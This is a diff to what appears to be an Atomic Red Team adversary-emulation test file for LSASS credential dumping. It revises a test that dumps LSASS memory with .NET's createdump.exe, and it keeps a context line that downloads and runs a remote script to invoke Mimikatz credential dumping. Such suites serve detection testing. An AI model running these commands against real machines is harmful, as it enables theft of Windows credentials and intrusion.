diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 0a3959df..9c1fcdd6 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -287,41 +287,31 @@ atomic_tests:
       IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
     name: powershell
     elevation_required: true
-- name: Dump LSASS with .Net 5 createdump.exe
+- name: Dump LSASS with createdump.exe from .Net v5
   auto_generated_guid: 9d0072c8-7cca-45c4-bd14-f852cfa35cf0
   description: |
-    This test uses the technique describe in this tweet 
-    (https://twitter.com/bopin2020/status/1366400799199272960?s=20) from @bopin2020 in order to dump lsass
+    Use createdump executable from .NET to create an LSASS dump.
+    
+    [Reference](https://twitter.com/bopin2020/status/1366400799199272960?s=20)
   supported_platforms:
   - windows
-  input_arguments:
-    output_file:
-      description: Path where resulting dump should be placed
-      type: Path
-      default: C:\Windows\Temp\dotnet-lsass.dmp
-    createdump_exe:
-      description: Path of createdump.exe executable
-      type: Path
-      default: 'C:\Program Files\dotnet\shared\Microsoft.NETCore.App\5.*.*\createdump.exe'
   dependency_executor_name: powershell
   dependencies:
   - description: |
-      Computer must have createdump.exe from .Net 5
+      .Net v5 must be installed
     prereq_command: |
-      if (Test-Path '#{createdump_exe}') {exit 0} else {exit 1}
+      $exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
+      if (Test-Path $exePath) {exit 0} else {exit 1}
     get_prereq_command: |
-      echo ".NET 5 must be installed manually." "For the very brave a copy of the executable can be found here: https://github.com/Scoubi/RedTeam-Tools/blob/main/createdump.exe"
+      winget install Microsoft.DotNet.DesktopRuntime.5 --accept-source-agreements --accept-package-agreements --silent
   executor:
     command: |
-      echo "Createdump Path #{createdump_exe}"
-      $LSASS = tasklist | findstr "lsass"
-      $FIELDS = $LSASS -split "\s+"
-      $ID = $FIELDS[1]
-      & "#{createdump_exe}" -u -f #{output_file} $ID
+      $exePath =  resolve-path "$env:ProgramFiles\dotnet\shared\Microsoft.NETCore.App\5*\createdump.exe"
+      & "$exePath" -u -f $env:Temp\dotnet-lsass.dmp (Get-Process lsass).id
     cleanup_command: |
-      Remove-Item #{output_file} -ErrorAction Ignore
+      Remove-Item $env:Temp\dotnet-lsass.dmp -ErrorAction Ignore
     name: powershell
-    elevation_required: true  
+    elevation_required: true    
 - name: Dump LSASS.exe using imported Microsoft DLLs
   auto_generated_guid: 86fc3f40-237f-4701-b155-81c01c48d697
   description: |